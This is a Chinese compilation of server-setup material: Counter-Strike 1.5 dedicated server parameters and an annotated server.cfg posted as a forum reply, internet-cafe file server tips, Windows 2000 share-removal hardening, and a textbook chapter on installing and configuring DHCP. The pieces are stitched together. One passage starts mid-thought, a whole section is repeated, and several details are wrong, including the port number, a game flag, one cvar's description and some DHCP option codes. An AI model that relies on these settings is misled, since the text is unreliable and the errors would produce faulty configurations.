mp_mapvoteratio 0.2 投票比率

mp_logfile1 是否服务器留下记录文件

logon 开始记录

mp_playerid 0 为所有人在状态栏都可看到所有人的名字；1为只能看到自己人的名字；2为看不到任何人名字；0为默认

mp_fadetoblack0 人物死亡后屏幕变黑，0为不变，1为默认

mp_buytime 可以购买物品时间，例如mp_buytime 1.8为108秒那可以购买，1.5分钟为默认

mp_winlimit15 一方胜利次数达到次数更换地图 allow_spectators1 允许观察员角度，0为不允许，1为允许，1为默认

mp_hostagepenalty=3 规定时间内伤害人质超过三人自动踢出

2.mapcycle.txt为地图设置文件，服务器将按该文件里设置的地图进行循环。可以在cstrike/maps目录下查看*.bsp文件，既是地图文件，可将你想循环的地图的名字输入mapcycle.txt中，注意不要带文件后缀。比如如de_dust.bsp，只取de_dust。注意每个地图之间用硬回车隔开。

3.motd.txt为服务器说明文件，当每个玩家进入服务器后看到的第一个窗口就是。可以随意按照自己喜欢写。最好注明服务器的基本设置。 有了一个上述设置的服务器基本就算准备好了，但是别急，可不是运行HL.exe来进入游戏哦，用的是HLS.exe，而且要带上参数。下面再来说说服务器运行参数：

F：\Hserver\hlds.exe -game cstrike -port 27016+maxplayers 22 +map　cs_office +nomaster -sv_lan 1

-game strike 指定运行游戏为CS

+maxplayers 22游戏最大人数22人(游戏只支持20人，多余两人为观众)

-port 7016 指定游戏连接端口为27016同一服务器指定不同的端口可以开多个CS服务器

+map cs_office 指定第一张地图为cs_office+servercfgfile server2.cfg Listen Server 指定启动的配置文件名称。此参数可以不使用，即用同一游戏开的不同端口服务器都使用相同配置文件

-nomaster 让服务器不上WON认证，避免因为出国网络不通导致的服务器问题。

+sv_lan1 指定为一个LAN server。其他人进服务器的时候，进Lan game即可自动搜索出服务器。

按照以上方式运行的服务器会在一个DOS窗口下运行，当窗口上的红色部分FPS里开始显示闪动数字的时候服务器就已经架设成功了。

苯熊熊的Email: 个人主页: 　　　<-回应| <-返回|
  回复： --------- 发表时间 2003-1-2-11:27:11 - 来自 61.242.215.138 - dsfsdfsf
// 这个文件将会设置您的服务器，当您换局时。
//服务器密码（客户端进入游戏密码） "" 表示没有
sv_password ""

//远程管理服务器密码 "" 表示没有
rcon_password ""

// 默认服务器名称"Nick's Counter-Strike Server"
hostname "=Euage= Clan CS1.5 Server"

// 最大速率10000 (局域网用10000或以上；Cable Modem/ xDSL 用4000-6000)（请勿设置过低）
sv_maxrate 10000

// 最小速率1000 (局域网用1000或以上；Cable Modem/ xDSL 用400-600)低于此速率的客户端连接将被踢出或禁止连接（请勿设置过高）
sv_minrate 1000

// 客户端最大移动速度
sv_maxspeed 320

// 暂停游戏 禁止0/允许1
pausable 0

// 作弊模式 关闭0/开启1
sv_cheats 0

// 自动瞄准 关闭0/开启1
sv_aim 0

// 战术手电 允许1/禁止0
mp_flashlight 1

// 脚步声 开启1/关闭0
mp_footsteps 1

// 高处落下伤害 开启1/关闭0
mp_falldamage 1

// 自动踢出不动的玩家 开启1/关闭0
mp_autokick 1

// 观察员模式 开启1/关闭0
allow_spectators 1

// 服务端设定游戏复位的时间，包括杀人数、武器、金钱和得分。设0不复位。
sv_restartround 2

// 每局时间30分钟
mp_timelimit 30

// 购买武器冻结时间 (0-45)建议5秒以内。
mp_freezetime 3

// 每回合4分钟
mp_roundtime 4

//购买武器装备时间(0.25-1.5)即15秒-90秒
mp_buytime 0.5

// 炸弹倒计时时间 (15-75)
mp_c4timer 35

//开始游戏时的金钱数量(800-16000)
mp_startmoney 800

// 死亡后视角 1本队队友 2原地 0无限制
mp_forcechasecam 1

// 死亡后视角模式 0自由跟随/1固定跟随
mp_chasecam 1

// 人物死亡后屏幕 不变黑0/变黑1
mp_fadetoblack 0

// 友军误伤 关闭0/开启1
mp_friendlyfire 0

// 手雷友军伤害 关闭0/开启1
mp_friendly_grenade_damage 0

// 杀害友军惩罚 0不惩罚/惩罚：杀害队友超过(1-n)人，下一回合自动死亡
mp_tkpunish 1

// 自动调整双方队伍平衡 不调整0/调整(1-n)个人
mp_autoteambalance 1

// 双方人数差超过n人即自动调整人数差异 0关闭
mp_limitteams 1

// 杀害人质惩罚 0不惩罚/惩罚：规定时间内伤害人质超过(1-n)人自动踢出
mp_hostagepenalty 0

// 杀人数、得分上限 无0/有(1-n)，超过上限就换地图。
mp_fraglimit 0

// 胜利次数上限无0/有(1-n)，超过上限就换地图。
mp_winlimit 0

// 回合上限 无0/有(1-n)，超过上限就换地图。
mp_maxrounds 0

// 允许下载 开启1/关闭0
sv_allowdownload 1

// 允许上传 关闭0/开启1
sv_allowupload 1

// 服务器重力设置 默认正常重力800，范围-999到99999
sv_gravity 800

// 投票比率(大家可以通过投票踢出作弊者和更换地图) (0.1-1)
mp_mapvoteratio 0.5

// 设定鬼魂模式刷新值(0.1-1)
mp_ghostfrequency 0.1

// 服务器高品质纹理 关闭0/开启1
sv_sendvelocity 0

// 服务器减少LAG延迟现象(对服务器要求高) 关闭0/开启1
mp_lowlag 0

// 服务器细节数据发送 默认300 ，可减低到250、200，改善速度。
mp_decals 200

// 服务器是否允许麦克风语音通讯 允许1/禁止0
sv_voiceenable 1

// 服务器是否允许客户端之间使用语音通信 允许1/禁止0
sv_alltalk 0

// 服务器是否记录文件 不记录0/记录1
mp_logfile 0

// 是否在记录文件里记录谈话内容 不记录0/记录1
mp_logmessages 0

    CS服务器人数设到最大值32，但如果满了，就会掉帧，所以可以根据你机器配置来设置人数，一台电脑可以设两个以上的服务器，只要把端口分开就可以了。

另一种是使用ASP编的Web方式，利用共享或流媒体播放程序打开这些电影，例如“file//电影服务器名字/电影/百年好合”，这样的好处就是可以把电影分类，并利于查找，此类编好的程序可到http://down.vv66.com:82/show.asp?id=4783下载。然后顺便再建一个FTP服务器，大家电影多，要想资源共享一下，使用Serv-U这个软件就可以很简单地实现了。当然，在路由器上也要映射一下默认端口21，这样，可以建一个主页，然后通过路由器把80端口映射一下。

    由于Windows 2000漏洞较多，所以装好之后，需要做以下几件事情：

    1.打补丁

    微软的作风就是三天一小补，五天一大补，漏洞太多，补一点就好一点，使用“开始→Windows Update”然后把所有的补丁都装进去吧（《电脑报》第20期D12版曾有介绍）。

    2.删除默认共享

    1删除IPC$共享
    Windows 2000的缺省安装很容易被攻击者取得账号列表，即使安装了最新的Service pack也是如此。在Windows 2000中有一个缺省共享IPC$，并且还有诸如admin$ C$ D$等等，而IPC$允许匿名用户（即未经登录的用户）访问，利用这个缺省共享可以取得用户列表。要想防范这些，可将在“管理工具→本地安全策略→安全设置→本地策略→安全选项”中的“对匿名连接的额外限制”修改为“不允许枚举SAM账号和共享”。就可以防止大部分此类连接，但是还没完，如果使用NetHacker只要使用一个存在的账号就又可以顺利地取得所有的账号名称。所以，我们还需要另一种方法做后盾：

    创建一个文件Startup.cmd，内容就是一行命令“net share ipc$ delete”不包括引号；

    在Windows的计划任务中增加一项任务，执行以上的startup.cmd，时间安排为“计算机启动时执行”，或者把这个文件放到“开始→程序→启动”中让它一启动就删除IPC$共享；

    重新启动服务器。

    （2）删除admin$共享

    修改注册表HKEY_LOCAL_MACHIN
    E\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters增加AutoShareWks子键（REG_DWORD），键值为0。

    （3）清除默认磁盘共享C$、D$等

    修改注册表HKEY_LOCAL_MACHI
    NE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters，增加AutoShareServer子键（REG_DWORD），键值为0。

    3.修改默认用户名

    在“管理工具→本地安全策略→安全设置→本地策略→安全选项”的“重命名来宾账户”将“guest”改成“abc”或者其他名字，下面机器登录名字设为名字，然后再把“重命名系统管理员账户”也改一下。有一次我扫描了一下我的IP段，就发现有多家网吧服务器的管理员名称是默认的Administrator，并且是简单密码。这一点应该引起我们重视。

    到此为止，网吧的两个服务器已经可以很安全稳定地运行下去了，当然别忘了每隔一两天重启一下你的服务器。


DHCP 服务器的安装和配置

《一键清理系统垃圾》

DHCP 服务器的安装和配置

本章主要内容：
1、DHCP的基本概念
2、DHCP服务器的新特性
3、Microsoft DHCP 客户机支持的选项类型
4、DHCP的运行方式
5、DHCP/BOOTP Relay Agents
6、DHCP服务器的安装与配置
7、维护DHCP的数据库文件
8、DHCP客户机的设置

    11.1 DHCP的基本概念
    11.1.1 DHCP是什么?
    动态主机分配协议（DHCP）是一个简化主机IP地址分配管理的TCP/IP 标准协议。用户可以利用DHCP服务器管理动态的IP地址分配及其他相关的环境配置工作（如：DNS、WINS、Gateway的设置）。

在使用TCP/IP协议的网络上，每一台计算机都拥有唯一的计算机名和IP地址。IP地址（及其子网掩码）使用与鉴别它所连接的主机和子网，当用户将计算机从一个子网移动到另一个子网的时候，一定要改变该计算机的IP地址。如采用静态IP 地址的分配方法将增加网络管理员的负担，而DHCP可以让用户将DHCP服务器中的IP 地址数据库中的IP 地址动态的分配给局域网中的客户机，从而减轻了网络管理员的负担。用户可以利用Windows 2000 服务器提供的DHCP服务在网络上自动的分配IP地址及相关环境的配工作。
    在使用DHCP时，整个网络至少有一台NT 服务器上安装了DHCP服务，其他要使用DHCP功能的工作站也必须设置成利用DHCP获得IP地址。如图 11.1所示是一个支持DHCP的网络实例

11.1.2 使用 DHCP的好处：
安全而可靠的设置
    DHCP 避免了因手工设置IP地址及子网掩码所产生的错误，同时也避免了把一个IP地址分配给多台工作站所造成的地址冲突。
降低了管理IP地址设置的负担
    使用DHCP 服务器大大缩短了配置或重新配置网络中工作站所花费的时间，同时通过对DHCP服务器的设置可灵活的设置地址的租期。同时，DHCP 地址租约的更新过程将有助于用户确定那个客户的设置需要经常更新（如：使用便携机的客户经常更换地点），且这些变更由客户机与DHCP服务器自动完成，无需网络管理员干涉。

11.1.3 DHCP 的常用术语

术 语
描 述

作用域
    作用域是一个网络中的所有可分配的 IP 地址的连续范围。作用域主要用来定义网络中单一的物理子网的 IP 地址范围。作用域是服务器用来管理分配给网络客户的 IP 地址的主要手段。

超级作用域
    超级作用域是一组作用域的集合，它用来实现同一个物理子网中包含多个逻辑 IP 子网。在超级作用域中只包含一个成员作用域或子作用域的列表。然而超级作用域并不用于设置具体的范围。子作用域的各种属性需要单独设置。

排除范围
    排除范围是不用于分配的 IP 地址序列。它保证在这个序列中的 IP 地址不会被 DHCP 服务器分配给客户机。

地址池
    在用户定义了 DHCP 范围及排除范围后，剩余的地址欧成了一个地址池，地址池中的地址可以动态的分配给网络中的客户机使用

租约
    租约是 DHCP 服务器指定的时间长度，在这个时间范围内客户机可以使用所获得的 IP 地址。当客户机获得 IP 地址时租约被激活。在租约到期前客户机需要更新 IP 地址的租约，当租约过期或从服务器上删除则租约停止。

（续表）

保留地址
    用户可以利用保留地址创建一个永久的地址租约。保留地址保证子网中的指定硬件设备始终使用同一个 IP 地址。

选项类型
    选项类型是 DHCP 服务器给 DHCP 工作站分配服务租约时分配的其它客户配置参数。经常使用的选项包括：默认网关的 IP 地址(routers), WINS 服务器, 及 DNS 服务器。一般在设置每个范围是这些选项都被激活。DHCP 管理器允许设置应用于服务器上所有范围的默认选项。大多数选项都是通过 RFC 2132 预先设定好的，但用户可以根据需要利用 DHCP 管理器定义及添加自定义选项类型

选项类
    选项类是服务器进一步分级管理提供给客户的选项类型的一种手段。当在服务器上添加一个选项类，该选项类的客户可以在配置是使用特殊的选项类型。在 Windows 2000 中，客户机在于服务器对话时也能够声明类 ID 。而对于早期的 DHCP 客户机不支持类 ID 。选项类包括两种类型：服务商类、客户类

11.1.4 DHCP工具
    DHCP 控制台是管理 DHCP 服务器的主要工具，在安装 DHCP 服务时加入到管理工具中。在 Windows 2000 服务器中，DHCP 控制台被设计成微软管理控制台(MMC)的一个插件，它与其它网络管理工具结合的更为紧密。在下面章节中用户会具体学习它的使用。
    在安装 DHCP 服务器后，用户可以用 DHCP 控制台执行以下一些基本的服务器管理功能：
    创建范围、添加及设置主范围和多个范围、查看和修改范围的属性、激活范围或主范围、监视范围租约的活动、
    为需要固定 IP 的客户创建保留地址
    添加自定义默认选项类型
    添加和配制由用户或服务商定义的选项类
    另外 DHCP 控制台还有新增的功能，如：增强了性能监视器、更多的预定意 DHCP 选项类型、支持下层用户的 DNS 动态更新、监测网络上为授权的 DHCP 服务器等。

11.2 DHCP 服务器的新特性
自动分配 IP 地址
    Windows2000 DHCP 工作站 DHCP 服务器无法提供租约的时候能够为自己分配一个临时的 IP 地址，DHCP 工作站在后台每隔 5 分钟继续尝试与服务器进行通信，以获得有效的租约。
增强的性能监视器和服务器报告能力
    新的性能监视计数器令用户更为清晰的观察 DHCP 服务器在网络上的性能状况。并且 DHCP 管理器利用图形显示服务器、范围和客户的当前状态增强了服务器的报告能力，如：利用不同的图标表示服务器或范围是否链接，利用警告符号表示已经有 90% 的租约被使用。
作用域的扩展：多址广播域、超级作用域
    新的多址广播域让 DHCP 工作站可以使用D类IP地址 (224.0.0.0 to 239.255.255.255) 。
超级作用域：对创建成员范围的管理组非常有用；当用户想重新定义范围或扩展范围时不会干扰正在活动的范围。
支持用户定义和服务商定义的选项类
    用户可以利用这一特性为类似的用户分别分配合适的选项。如：用户可以将同一楼层的用户设为相同的选项类（具有相同的类ID值），年可以利用这个类在租约过程中分配其它的选项数据，并覆盖任何范围或全局默认选项。通过它可以让在同一网络中的类成员客户使用更为合适的选项。

11.2 DHCP 服务器的新特性
自动分配 IP 地址
    Windows2000 DHCP 工作站 DHCP 服务器无法提供租约的时候能够为自己分配一个临时的 IP 地址，DHCP 工作站在后台每隔 5 分钟继续尝试与服务器进行通信，以获得有效的租约。
增强的性能监视器和服务器报告能力
    新的性能监视计数器令用户更为清晰的观察 DHCP 服务器在网络上的性能状况。并且 DHCP 管理器利用图形显示服务器、范围和客户的当前状态增强了服务器的报告能力，如：利用不同的图标表示服务器或范围是否链接，利用警告符号表示已经有 90% 的租约被使用。
作用域的扩展：多址广播域、超级作用域
    新的多址广播域让 DHCP 工作站可以使用D类IP地址 (224.0.0.0 to 239.255.255.255) 。
超级作用域：对创建成员范围的管理组非常有用；当用户想重新定义范围或扩展范围时不会干扰正在活动的范围。
支持用户定义和服务商定义的选项类
    用户可以利用这一特性为类似的用户分别分配合适的选项。如：用户可以将同一楼层的用户设为相同的选项类（具有相同的类ID值），年可以利用这个类在租约过程中分配其它的选项数据，并覆盖任何范围或全局默认选项。通过它可以让在同一网络中的类成员客户使用更为合适的选项。

DHCP与DNS的集成
    使用Windows2000,DHCP服务器能够动态更新客户机在DNS中的名字空间，范围客户可以利用动态DNS 更新它们在DNS中主机名---IP地址的映射信息。 未授权DHCP服务器侦测
因为DHCP 客户机在登录时采用网络有限广播的形式来查找DHCP服务器，这样有效的阻止了未授权DHCP服务器加入到已存在Windows2000 DHCP服务器的网络中。
非法DHCP服务器检测
    因为DHCP客户机在启动时是通过有限的网络广播来发现DHCP服务器的，利用这一特性有效的阻止了未经授权的DHCP服务器加入到基于活动目录架构的Windows 2000网络中，在非法的DHCP服务器引起网络问题之前，它被自动关闭。
动态支持BOOTP 客户
    DHCP服务器通过附加的动态BOOTP对大型企业网中的BOOTP用户提供更好的支持。动态BOOTP是BOOTP协议的扩展，他允许不必使用固定地址配制，它可以想DHCP一样动态的分配IP地址。
利用只读控制台访问DHCP管理器
    在安装DHCP服务时自动添加了一个具有特殊目的的本地组-DHCP用户组，这个组的成员可以在管理员不在的情况下通过只读方式访问服务器上DHCP管理器查看DHCP服务的相关信息。

11.3 Microsoft DHCP 客户机支持的选项类型
    运行以下操作系统的计算机都支持DHCP服务：
Windows NT Workstation (all released versions)
Windows NT Server (all released versions)
Windows 98
Windows 95
Windows for Workgroups version 3.11
Microsoft-Network Client version 3.0 for MS-DOS
LAN Manager version 2.2c
    默认情况下，运行Microsoft操作系统的DHCP客户机能够识别以下两种选项设置：

11.3.1 信息选项
    用户可以利用 DHCP 管理器明确的设置这些提供给客户机使用的选项类型及相关参数
    下表列出了用于配制及支持 Microsoft DHCP 客户机的常用DHCP选项：

代码
选项

3
Router

6
DNS server

15
DNS domain name

44
WINS server (NetBIOS name server)

45
NetBIOS datagram distribution server (NBDD)

46
WINS/NetBIOS node type

47
NetBIOS scope ID

    当 DHCP 服务被激活后提供这些信息选项类型的设置信息，客户机收到这些设置信息后，利用它们设置本地的 TCP/IP 中相应的配制项默认情况下服务器上的所有服务均可激活并设置这些选项类型

11.3.2 内部协议选项
    这类选项类型参数是通过服务器的 DHCP 服务和服务属性做的隐含设置
    下表列出 DHCP 客户机在与 DHCP 服务器通信以便更新租约时所使用的内部协议选项：

代码
选项

51
Lease Time

53
NetBIOS scope ID DHCP Message Type

58
NetBIOS scope ID Renewal Time

59
NetBIOS scope ID Rebind Time

11.4 DHCP 的运行方式

    11.4.1 客户机的 IP 自动设置
    对使用 Windows 2000 操作系统的 DHCP 客户机在启动登录网络时无法与 DHCP 服务器通信，它将自动给自己分配一个 IP 地址和子网掩码，客户机的这种特点被称作：IP auto-configuration
    如果客户机被设置成从 DHCP 服务器获得IP地址，使用 Windows 2000 操作系统的客户机利用其上的 DHCP 客户服务通过两步来配制它的 IP 地址和其它配制信息：
    1. DHCP 客户机试图与DHCP服务器建立通信以获得配制信息
    2. 如客户机无法找到DHCP服务器则它从微软保留的 B 类网段 169.254.0.0 中挑选一个 IP 地址作为自己的 IP 地址，子网掩码为 255.255.0.0 DHCP 客户机利用 ARP 广播来确定自己所挑选的 IP 地址是否已被网络上的其它设备使用，如该 IP 地址已被使用则客户机再挑选另一个 IP 从新进行测试，最多可以重试十个 IP 地址。

    3. 如客户机挑选的 169.254.0.0 网段中的 IP 地址未被其它设备使用则它将这个地址分配给网卡使用。
    4. 客户机在后台继续每隔 5 分钟尝试与DHCP服务器进行通信，一旦与服务器取得联络，则客户机放弃自动设置的 IP 地址，而使用服务器分配的 IP 地址和其它配制信息。
    如果 DHCP 客户机已经从服务器上获得了一个租约，在其重新启动登录网络时将进行以下操作：
    1． 如果在启动是客户机的租约仍然有效，它将尝试与 DHCP 服务器进行通信更新它的租约。
    2． 如果在试图更新租约时无法找到 DHCP 服务器，则客户机尝试 PING 在租约中设置的默认网关
§　如果成功的 PING 到默认网关，则客户机认为它仍然在同一个网络中，它将继续使用现有的租约，在租期达到 50% 时它在后台继续尝试更新租约。
§　如果无法成功的 PING 到默认网关，则客户机认为它已被移动到一个没有 DHCP 服务的网络中。客户机则利用前面所说的自动分配 IP 的功能给自己分配一个 IP 地址。

11.4.2 客户机如何获得配制信息
    DHCP 客户机使用两种不同的方法与服务器进行通信并获得配制信息。
第一次启动登录网络时的初始化租约过程
    当DHCP客户机启动登录网络时通过以下步骤从 DHCP 服务器获得租约：
    1. DHCP 客户机在本地子网中先发送 DHCP discover 信息，此信息以广播的形式发送，因为客户机现在不知道DHCP服务器的IP地址。
    2. 在 DHCP 服务器收到DHCP客户机广播的 DHCP discover 信息后，它向DHCP客户机发送 DHCP offer 信息，其中包括一个可租用的 IP 地址
    3. 如果没有 DHCP 服务器对客户机的请求作出反应，可能发生以下两种情况：
§　如果客户使用的是 Windows 2000 操作系统且自动设置IP地址的功能处于激活状态，那么客户机自动给自己分配一个 IP 地址。
§　如果使用其它的操作系统或自动设置 IP 地址的功能被禁止，则客户机无法获得 IP 地址，初始化失败。但客户机在后台每隔 5 分钟发送四次 DHCP discover 信息直到它收到 DHCP offer 信息。
    4. 一旦客户机收到 DHCP offer 信息，它发送 DHCP request 信息到服务器表示它将使用服务器所提供的 IP 地址

    5. DHCP 服务器在收到 DHCP request 信息后，即发送 DHCP positive 确认信息，以确定此租约成立，且此信息中还包含其它 DHCP 选项信息。
    6. 客户机收到确认信息后，利用其中的信息配制它的 TCP/IP 属性并加入到网络中。
    如图 11.2所示是 DHCP 客户机从 DHCP 服务器获得租约的过程
    7. 当客户机请求的是一个无效的或重复的 IP 地址，则 DHCP 服务器在第五步发送 DHCP negative 确认信息，客户机收到 DHCP negative 确认信息初始化失败。

DHCP 客户机更新租约的过程：
    在客户机重新启动或租期达到 50% 时，客户机都需要更新租约
    1. 客户机直接向提供租约的电位器发送请求，要求更新及延长现有地址的租约。
    2. 如果 DHCP 服务器收到请求，它发送 DHCP 确认信息给客户机，更新客户机的租约。
    3. 如果客户机无法于提供租约的服务器取得联系，则客户机一直等到租期达到 87.5% 时，客户机进入到一种重新申请的状态，它向网络上所有的 DHCP 服务器广播 DHCP discover 请求以更新现有的地址租约。
    4. 如有服务器响应客户机的请求，那么客户机使用该服务器提供的地址信息更新现有的租约。
    5. 如果租约过期或无法与其它服务器通信，客户机将无法使用现有的地址租约。
    6. 客户机返回到初始启动状态，利用前面所述的步骤重新获取 IP 地址租约。

11.5 DHCP/BOOTP Relay Agents
    如果用户需要建立多台 DHCP 服务器，但 DHCP 服务器与客户机分别位于不同的网段上，则用户的 IP Router 必须符合 RFC1542 的规定，即必须具备 DHCP/ BOOTP Relay Agent 的功能。
    relay agent 是一个把某种类型的信息从一个网段转播到另一个网段的小程序。DHCP relay agent 是一个硬件或程序，它能够把 DHCP/BOOTP 广播信息从一个网段转播到另一个网段上。
    Relay Agents 是如何工作的？

用户用一个实例来说明 Relay Agent 是如何工作的：
    如图 11.3 在子网 2 中的客户机 C 从子网 1 中的 DHCP Server1 上获得 IP 地址租约。
    DHCP 客户机 C 在子网 2 上广播 DHCP/BOOTP discover 消息 (DHCPDISCOVER),广播是将消息以 UDP (User Datagram Protocol)数据包的形式通过 67 端口发出的。

当 relay agent（在本例中是一个具有 DHCP/BOOTP relayAgent 功能的路由器）接收到这个消息后,它检查包含在这个消息报头中的网关 IP 地址，如果 IP 地址为 0.0.0.0 ,则用 relay agent 或路由器的 IP 地址替换它，然后将其转发到 DHCP 服务器所在的子网 1 上。
    当在子网 1 中的 DHCPServer1 收到这个消息后，它开始检查消息中的网关IP地址是否包含在 DHCP 范围内，从而决定它是否可以提供 IP 地址租约。
    如果 DHCP Server1 含义多个 DHCP 范围，消息中的网关 IP 地址 (GIADDR) 是用来确定从那个 DHCP 范围中挑选 IP 地址并提供给客户。
    DHCP Server1 将它所提供的 IP 地址租约 (DHCPOFFER) 直接发送到 relay agent
    路由器将这个租约利用广播的形式转发给 DHCP 客户机。
    注意：如果要配制多台 DHCP 服务器，最好将它们分别放在不同的网段中，且每个 DHCP 服务器上都应建立独立的地址池，在地址池中应包含各个网段的 IP 地址。

    11.6 DHCP 服务器的安装与配置
    11.6.1 安装前的注意事项:
    DHCP 服务器本身必须采用固定的IP地址
    规划 DHCP 服务器的可用IP地址
下面首先介绍如何规划 DHCP 的地址池在规划 DHCP 服务器是需要考虑以下三方面的问题：
    1．需要建立多少个 DHCP 服务器
    通常认为每 10000 个客户需要两台 DHCP 服务器，一台作为主服务器另一台作为备份服务器。但在实际工作中用户要考虑到路由器在网络中的位置，是否在每个子网中都建立 DHCP 服务器，以及网段之间的传输速度。如果两个网段间是用慢速拨号连接在一起，那么用户就需要在每个网段设立一个 DHCP 服务器。
    对于一台 DHCP 服务器没有客户数的限制，在实际中受用户所使用的 IP 地址所在的地址分类及服务器的配制（如：磁盘的容量、CPU 的处理速度等）的限制

2．如何支持其它子网
    如果需要 DHCP 服务器支持网络中的其它子网，首先要确定网段间是否用路由器连接在一起，路由器是否支持 DHCP/BOOTP relay agent ,如果路由器不支持 relay agent ,那么使用以下方案来解决：
§　一台安装了 Windows 2000 Server 或 Windows NT Server 4.0 计算机并将其设置为使用 DHCP Relay Agent 组件
§　一台安装了 Windows 2000 Server 并被设置为本地的DHCP服务器的计算机
    3.规划企业网所须考虑的问题
§　DHCP 服务器于网络中位置，将通过路由器的广播降至最低
§　为每个范围的 DHCP 客户机指定相应的选项类型并设置相应的数值
§　充分认识到慢速广域网连接所带来的影响。

11.6.2 安装 DHCP 服务器的步骤如下：
    步骤1 启动 "添加/删除程序"对话框
    步骤2 单击"添加/删除 Windows 组件"出现 "windows 组件向导单击下一步"出现 "Windows 组件"对话框从列表中选择"网络服务" 如图 11.4

步骤3 单击"详细内容"，从列表中选取"动态主机配置协议（DHCP）" 如图 11.5单击"确定"
    步骤4 单击"下一步" 输入到 Windows2000 Server 的安装源文件的路径，单击"确定"开始安装 DHCP 服务
    步骤5 单击"完成"，当回到"添加/删除程序"对话框后，单击"关闭"按钮
    安装完毕后在管理工具中多了一个 "DHCP" 管理器

11.6.3 添加 DHCP 服务器
    在安装 DHCP 服务后，用户必须首先添加一个授权的 DHCP 服务器，并在服务器中添加作用域设置相应的 IP 地址范围及选项类型，以便 DHCP 客户机在登录到网络时，能够获得 IP 地址租约和相关选项的设置参数。
    添加 DHCP 服务器的步骤如下：
    步骤1 启动 DHCP 管理控制台，如图 11.6

步骤2 选择"操作"菜单中的"添加服务器"，启动添加服务器向导单击"下一步"出现"指定 DHCP 服务器"对话框如，单击"浏览"按钮后出现"目录中授权的服务器"对话框，在此用户可用给DHCP服务器添加授权，单击"添加"按钮，出现"授权 DHCP 服务器"窗体 如图 11.7，填写用户要建立 DHCP 服务的服务器名或 IP 地址。

步骤3 在"目录中授权的服务器"对话框中选择上一步添加的服务器，单击"管理"→下一步→完成
在 "DHCP" 管理控制台中出现刚才添加的服务器
    如图 11.8

    11.6.4 在 DHCP 服务器中添加作用域
    步骤1 在 DHCP 控制台中单击要添加作用域的服务器→操作→新建→作用域→出现"创建作用域向导"
    步骤2 单击"下一步"然后"输入作用域名"对话框在此输入本域的域名
    步骤3 单击"下一步"输入作用域将分配的地址服务几子网掩码 如图 11.9，

步骤4 单击"下一步"在"添加排除"对话框中输入需要排除的地址服务
    如图 11.10
    步骤5 单击"下一步"选择租约期限（默认为 8 天）

步骤6 单击"下一步"选择配置 DHCP 选项
    如图 11.11，
    步骤7 单击"下一步"输入默认网关 IP 地址，

步骤8 输入域名称和 DNS 服务器的 IP 地址
    如图 11.12，
    步骤9 单击"下一步"添加 WINS 服务器的地址，
    步骤10 单击"下一步"选择激活作用域

    步骤11 在 DHCP 控制台中出现新添加的作用域 如图 11.13，在 DHCP 控制台右侧窗体中的状态条中显示"运行中"表示作用域已启用。
设置完毕，当 DHCP 客户机启动是可以从 DHCP 服务器获得 IP 地址租约及选项设置。在 DHCP 控制台中作用域下多了四项：
    地址池：用于查看、管理现在的有效地址范围和排除范围
    地址租约：用于查看、管理当前的地址租用情况
    保留：用于添加、删除特定保留的 IP 地址
    作用域选项：用于查看、管理当前作用域提供的选项类型及其设置值

注意：如果为提高容错性而在同一个网段上使用两台 DHCP 服务器，在分配 IP 地址范围是要注意考虑到 DHCP 服务器的平衡使用的因素，一般采用 80/20 的规则，即将所有可用的 IP 地址范围按 8：2 的比率分开，一台 DHCP 服务器提供 80% 的 IP 地址租约，另一台提供其它 20% 的 IP 地址租约。具体设置方法如下：假设要在某个网段上提供的 IP 地址范围是 198.188.188.1~198.188.188.254 ,把两台服务器的作用域将分配的地址范围都设置为 198.188.188.1~198.188.188.254 ,只是在设置排除范围是加以区分，见下表：
    服务器　　　分配的地址范围　　　　　　　　　　　排除的地址范围
    服务器1　　198.188.188.1 - 198.188.188.254　　 198.188.188.201 - 198.188.188.254
    服务器2　　198.188.188.1 - 198.188.188.254　　 198.188.188.1 - 198.188.188.200

    11.6.5 添加授权服务器
    如果在添加作用域后出现 如图 11.14警告对话框表示作用域所在的服务器未经授权，这时作用域不能启用，服务器图标上是一个红色向下的图标，需要对服务器授权后才能启动
    步骤1 单击左侧窗体的 DHCP 选择"操作"菜单选择"浏览授权的服务器"

步骤2 单击"添加"按钮，输入服务器的 IP 地址后单击"确定"后出现 如图 11.15 提示框表示服务器已被添加到授权列表中→关闭
    步骤3 在 DHCP 控制台中单击"刷新"按钮会发现服务器图标上是一个红色向上的箭头表示服务器被激活，DHCP 服务启用

11.6.6 添加超级作用域
    如果需要在局域网中的每一个子网中都设立 DHCP 服务器，那么就一定要使用超级作用域。
    因为每一台 DHCP 客户机在初始启动是都需要在子网中以有限广播的形式发送 DHCP discover 消息，如果网络中有多台 DHCP 服务器用户将无法预知是那一台服务器响应客户机的请求。假设网络上有两台服务器：服务器 1 和服务器 2 分别提供不同的地址范围，如果服务器 1 为客户机通过地址租约，在租期达到 50% 时客户机要与服务器 1 取得通信以便更新租约，如果无法与服务器 1 进行通信，在租期达到 87.5% 的时候，客户机进入重新申请状态，客户机在子网上发送广播，如果服务器 2 首先响应，由于服务器 2 提供的是不同 IP 地址范围，它不知道客户机现在所使用的是有效的 IP 地址，因此它将发送 DHCPNAK (negative acknowledgement) 给客户机，客户机无法获得有效的地址租约。在服务器 1 处于激活状态这种情况也可能发生。
    所以需要在每个服务器上都配置超级作用域防止上述问题的发生。超级作用域要包括子网中所有的有效地址范围作为它的成员范围，在设置成员范围时把子网中其它服务器所提供的地址范围设置成排除地址。
    步骤1 单击服务器→操作超级作用域→填写超级作用域的域名→选择要添加到超级作用域的作用域→完成
    步骤2 在每个作用域的地址池中将其它作用域的地址范围设为排除

11.6.7 保留特定的 IP 地址
    如果用户想保留特定的 IP 地址给指定的客户机（如：WINS Server、IIS Server 等），以便客户机在每次启动是都获得相同的 IP 地址，设置步骤如下所示：
    步骤1 启动 "DHCP 控制台"
    步骤2 在出现 "DHCP 控制台"窗体后，在左侧窗格中选择作用域中的保留项
    步骤3 选择"操作"单击"添加"，之后出现"添加保留"对话框，如图 11.16
    步骤4 在图 11.16 中 "IP 地址"文本框中输入要保留的 IP 地址，如本例中的 198.188.188.18

    步骤5 在图 11.16 中 "MAC 地址"文本框中输入上述IP地址要保留给哪一个网卡号，每一块网卡都有一个唯一的号码，可利用网卡附带的软件进行查看，在 Windows NT 或 Windows 2000 计算机中可利用 net config wkstation 命令得知。在 Windows95/98 计算机中可利用 Winipcfg.exe 程序查看网卡号。
    注意：如果网卡号未满 12 个字符，则在输入时前面补 0 。

